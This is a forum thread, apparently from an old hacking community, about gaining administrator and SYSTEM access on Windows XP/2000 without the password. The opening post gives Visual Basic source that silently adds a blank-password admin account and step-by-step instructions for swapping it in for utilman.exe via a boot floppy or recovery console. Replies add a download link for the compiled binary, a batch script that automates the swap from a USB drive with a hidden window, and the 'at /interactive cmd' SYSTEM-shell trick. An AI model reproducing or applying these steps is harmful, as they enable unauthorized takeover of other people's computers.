Gain SYSTEM/Administrative Access to Windows XP/2000

[celltoolz]

OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!

Gain SYSTEM/Administrative Access to Windows XP/2000

I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this

to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.

(Im stoned and its 3:15a.m. so i hope this makes sense)

Overview:

Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is

located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make

your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.

If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this

will take a few minutes depending on how fast the PC is.

First We need to make the program

I used Visual Basic 6, here is my source code that i used to create the administrative account:

#################################START###############################

Private Sub Form_Load()

Shell "net user NewAdmin " & """""" & " /add", vbHide

Pause (1)

Shell "net localgroup administrators NewAdmin /add", vbHide

Pause (1)

msgbox "Added Administrative User",16,"Hacked XP"

End

End Sub

Sub Pause(interval)

'Pauses execution

Current = Timer

Do While Timer - Current < Val(interval)

DoEvents

Loop

End Sub

'#################################END###############################

Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank

password and then adds them to the Administrators Group.

Ok Now that we've made the program lets move on...

FAT32

1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe

2. Add the newly made Utilman.exe to the Floppy

3. Restart the computer with the floppy in it

4. After DOS loads type C: and press enter.

5. If it changes from A:/> to C:/> then your doing good

6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file

7. Restart the computer without the floppy in it

8. When it gets to the Login Screen Press the Windows Key + U

9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10

9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your

PC.

10. After pressing <b>Windows Key + U</b> then type in the username NewAdmin and push Enter. Thats It you now have administrative access to

your PC.

NTFS

Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)

LOL i hope that made sense

[Darren Kitchen]

this hack has potential. I did not know that the utilman program could run before login. the hardest part of this hack is replacing the utilman.exe with your payload. I understand that you must do it outside of windows but I'm thinking there might be another way. Possibly a program that will run on next boot that replaces the file before windows has a chance to lock it. If that's the case it could be implemented in a version of the switchblade. otherwise a way for automation would be necessary. for fat32 it's pretty simple with an autoexec.bat but most people are running ntfs now and unfortunately linux has trouble writing to those partitions.

thoughts?

(ps: excuse me if this doesnt make sense, its 3am and im blitzed on painmeds)

[jr1]

an alternative to rebooting would be the following keystrokes.

hold CTRL and ALT and DOUBLE TAP the DEL key

This will bring up a normal login dialog (non welcome screen)

[celltoolz]

hold CTRL and ALT and DOUBLE TAP the DEL key....... I didnt know about that, lol.. wish i did on some of the slower machine i did this too.. Thanks for the reply thats really usefull

[Iain]

Isn't this similar to replacing winlogon.scr (I think that's the filename) with, for instance, a renamed copy of cmd.exe? When that's done, reboot, wait for 15 minutes for the "screensaver" to kick in and a command screen comes up. The pain with that technique is the 15 minute wait (hence I like the idea of using utilman.exe), along with replacing the file outside of windows.

I like the idea of doing the replacement at the next reboot, but just wonder how feasible that is. I hope that someone comes up with a way.

[cooper]

The only suggestion I'd like to make at this point is to, before of overwriting, backup the utilman program. So that once the account has been created you can put the orinal program back. If the system wants to run it at boot I'd assume it needs it to do something that it won't be doing anymore with this hack in place.

[celltoolz]

Yes make sure to always make backups... Forgot to mention that one. Its not really that important of a file though. All it is, is a program to launch the On Screen Keyboard, Narrator, and Magnifier. Not really a must have file but it would be a good idea to overwrite with the original one after your done cause you dont want everyone to have access to your computer just by pushing Windows Key + U :) Happy Hackin

Cell Toolz

[armadaender]

Interesting, I never thought of overwriting a system file before login. I'll be sure to give this a try sometime over the weekend.

Very clever.... Perhaps too clever!

[a5an0]

Heres a quick way to get SYSTEM acess from the command line:

you only need enough priv's to run the 'at' command.

1. pop open a shell. (Start -> Run -> cmd)

2. at [one minute later than the current time] /interactive cmd

one minute later a new shell will open up. This shell has SYSTEM level priv's. This works because the at daemon is run by LOCAL SYSTEM. so, you now have a SYSTEM shell. Its like exploiting a root process to get root.

For added fun, open up task manager and kill explorer. then type 'explorer.exe' in you system-level shell. BAM! Now your desktop is running as LOCAL SYSTEM. All child processes will also have LOCAL SYSTEM as their owner, s you can in fact play root-level minesweeper.

Enjoy!

[Sparda]

Heres a quick way to get SYSTEM acess from the command line:

you only need enough priv's to run the 'at' command.

1. pop open a shell. (Start -> Run -> cmd)

2. at [one minute later than the current time] /interactive cmd

one minute later a new shell will open up. This shell has SYSTEM level priv's. This works because the at daemon is run by LOCAL SYSTEM. so, you now have a SYSTEM shell. Its like exploiting a root process to get root.

For added fun, open up task manager and kill explorer. then type 'explorer.exe' in you system-level shell. BAM! Now your desktop is running as LOCAL SYSTEM. All child processes will also have LOCAL SYSTEM as their owner, s you can in fact play root-level minesweeper.

Enjoy!

That only works if you have a admin acount in the first place.

[Cynagen]

• I don't know if this counts, or if it's already been posted someplace else in the forums, but I know an easy way to gain local Administrator account access on the machine in case you need that windows version of the root account.

Steps are as follows:

• Rightclick on My Computer, choose Manage
• Choose Local Users and Groups in Computer Management, open Users folder
• Rightclick on Administrator, choose rename, use any other name besides Admin or Administrator in any form
• Rightclick on the new username, and choose Set Password, you can now change their password to anything you want
• Rename back to Administrator, done

This isn't removing a password, or spending hours with a cracking application or sitting there cracking it by staring at data all day, but I hope this helps people achieve the same thing you're looking for here, it's worked every time i've used it, don't know if it'll work under a standard User Account (as set under Users in Control Panel.)

[Sparda]

I don't know if this counts, or if it's already been posted someplace else in the forums, but I know an easy way to gain local Administrator account access on the machine in case you need that windows version of the root account.

Steps are as follows:

[*]Rightclick on My Computer, choose Manage

[*]Choose Local Users and Groups in Computer Management, open Users folder

[*]Rightclick on Administrator, choose rename, use any other name besides Admin or Administrator in any form

[*]Rightclick on the new username, and choose Set Password, you can now change their password to anything you want

[*]Rename back to Administrator, done

[/list:o]

This isn't removing a password, or spending hours with a cracking application or sitting there cracking it by staring at data all day, but I hope this helps people achieve the same thing you're looking for here, it's worked every time i've used it, don't know if it'll work under a standard User Account (as set under Users in Control Panel.)

I just tested this and it dosn't work, get access denied message when renaming the admin acount.

[Cynagen]

@Sparda: Done under user level account?

[Sparda]

Yes, the user I tried it with is a member of the users groupe.

[Cynagen]

Yes, the user I tried it with is a member of the users groupe.

I assume that's the topic of this thread, regain admin access from a user level account on the machine. Oh well, it seems the easier ways of direct system level access all start with admin level access. So this is a really good thread so far, admin to system level accesses posted here, a terminal, and just taking over admin altogether with a new password, and the thread's topic of gaining admin in the first place.

[kickarse]

To restore utilman.exe just add to your list

ren c:windowssystem32utilman.exe utilman.bak

copy a:utilman.exe c:windowssystem32utilman.exe

Also after the restart and boot into dos just delete the utilman.exe you copied and then

ren c:windowssystem32utilman.bak utilman.exe

This could be easily run on the switchblade, floppy or cd boot disk...

Nice guide btw.

Also, this guys talks some bulsh. I've done most of what he has said before...

http://www.codeproject.com/useritems/HackXPSimpleWay.asp

Good overview of Windows Login

http://www.phlak.org/docs/microsoft/modify...credentials.txt

http://www.phlak.org/docs/

Oh... and I so don't remember how to use VB (been since I was in High School) so if you could compile it and post the exe that would be nice.

[celltoolz]

Here the compiled version of the code - http://www.project420.web1000.com/utilman.exe

ive never used switchblade im checkin it out right now. i like the way you did the backup but i think you can use Windows File Protection to back it up if it ever gets lost... i know its there somewhere

[PoyBoy]

Sticky!! Sticky!! Sticky!!

[kickarse]

Here the compiled version of the code - http://www.project420.web1000.com/utilman.exe

ive never used switchblade im checkin it out right now. i like the way you did the backup but i think you can use Windows File Protection to back it up if it ever gets lost... i know its there somewhere

Cool thanks I'll try this out sometime soon...

The .bak extension rename is safer I think than WFP. Only because what if WFP screws something up? I mean with just renaming it you don't really have to worry about it.

Also check out Hiren's Boot CD 8.4 it has NTFS4DOS Pro on it which has full NTFS read/write. I've had to do similar with the SAM and SYSTEM files on my grandparents computer before.

[temperseed]

cmdow@ /HID 

@echo off



; i suggest cmdow to make sure the .bat window isnt so obvious.

; now i look for the drive on witch my switchblade is...



FOR %%i IN (D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %%I:PlaceHolder.txt SET USB=%%i:



ren c:windowssystem32utilman.exe utilman.bak

copy %USB%utilman.exe c:windowssystem32utilman.exe

shutdown -f -t 30 -c "Command successfull, restarting..."



;Rename the old placeholder



ren %USB%PlaceHolder.TXT Restoring.txt

ren c:windowssystem32utilman.bak utilman.exe

Thats the long way, or u can simply set your switchblade a fixed drive letter using a little prog called USBDLM, wich i still havent tested, since im using a PXE windows + portable firefox to post msg's while i fix both my computers. Hope you like the idea, and improve itcustumize it.

cmdow http://www.commandline.co.uk/cmdow/index.html

USBDLM http://www.uwe-sieber.de/usbdlm_e.html

[kickarse]

Really good idea!

Useful for computers that boot off a USB drive... we could also get this for a cd or a floppy. Thanks!

[cooper]

What kinda sucks about this approach is that you're accessing all drives. This is potentially slow (spin-up time for CDs and such) and a bit of a hit-or-miss.

Basically, you're running on the CD right now, so the other partition should be the next or previous drive letter, shouldn't it?

Alternatively, or possibly additionally, couldn't you use the drive label of the partition? Those might be faster to get to.

[temperseed]

What kinda sucks about this approach is that you're accessing all drives. This is potentially slow (spin-up time for CDs and such) and a bit of a hit-or-miss.

Basically, you're running on the CD right now, so the other partition should be the next or previous drive letter, shouldn't it?

Alternatively, or possibly additionally, couldn't you use the drive label of the partition? Those might be faster to get to.

Kinda woke up, but it looks like your refering to my post... Mmm i understand what your saying and its 60% true for everyone in the world, witch is not bad, its the odds you get for an open heart transplat at age 80 (with only cardiovascular pathies) must of miss-spelled somewhere (bad english)... WOAH!!! anywayyss...

I used a partition manager (HirensBootCD) to partition + format my HD the way i wanted it just before i do a clean install of windows, but this last time when i used the little program it recognized my portable media all in one slots (9 in total) as 9 different harddrives + 2CDROMS ...

:evil: So now i have my "Local Drive" other wize know as my windows main HD as drive I: and my backup drive as C: :shock: And ofcourse i cant use anything to change the drive letter to my main windows file, cuz then ill get some errors and ill need to re-download my wnXP cd (wich i lost and i gotta download)

This same scenario could be applied to every dual boot person in the world that prefeers LinuxMac over windows, and only keep windows in for special ocations (like playing the latest version of UT? Quake... or things like that)

I just hope the main developers of both switchblade & this hack realize the potential of this little addon... Allthough the 2nd and shortest method will be good for speeding up hacks on pre-owned computers, it still works.

[Famicoman]

This is awesome

[a5an0]

Heres a quick way to get SYSTEM acess from the command line:

you only need enough priv's to run the 'at' command.

1. pop open a shell. (Start -> Run -> cmd)

2. at [one minute later than the current time] /interactive cmd

one minute later a new shell will open up. This shell has SYSTEM level priv's. This works because the at daemon is run by LOCAL SYSTEM. so, you now have a SYSTEM shell. Its like exploiting a root process to get root.

For added fun, open up task manager and kill explorer. then type 'explorer.exe' in you system-level shell. BAM! Now your desktop is running as LOCAL SYSTEM. All child processes will also have LOCAL SYSTEM as their owner, s you can in fact play root-level minesweeper.

Enjoy!

That only works if you have a admin acount in the first place.

True, but realy, who doesn't run windows as a non-admin account. Yes, yes, yes, public terminals are an exception. But for individual users, everyone is admin.